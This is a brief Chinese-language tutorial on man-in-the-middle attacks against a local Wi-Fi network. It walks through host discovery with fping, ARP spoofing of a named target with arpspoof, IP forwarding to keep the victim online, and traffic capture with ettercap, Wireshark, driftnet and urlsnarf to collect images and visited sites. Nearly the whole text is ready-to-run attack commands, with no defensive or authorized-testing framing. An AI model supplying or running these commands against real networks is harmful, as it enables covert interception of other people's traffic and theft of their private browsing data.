首先连接wifi,进入内网
1,查看内网的存活主机 命令 fping -asg 192.168.1.0/24 (视不同环境而定,假设这里的路由器地址为 192.168.1.1)
也可利用其他工具查看其他主机,方法有很多
2,arp欺骗 命令 arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1
上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的
3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络
转发命令 echo 1 >/proc/sys/net/ipv4/ip_forward 将参数换为1
这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包 ettercap -Tq -i wlan0
获取图片和浏览的网站driftnet -i wlan0 urlsnarf -i wlan0
-------------------------------------------------------------------------------------------------------------
另一种图形化的欺骗方式
ettercap -G 启动图形化的ettercap
先扫描内网用户,然后添加目标ip和192.168.1.1
选择 Mitm arp sniff
完成后启动效果和上面一样
arp欺骗是渗透内网的第一步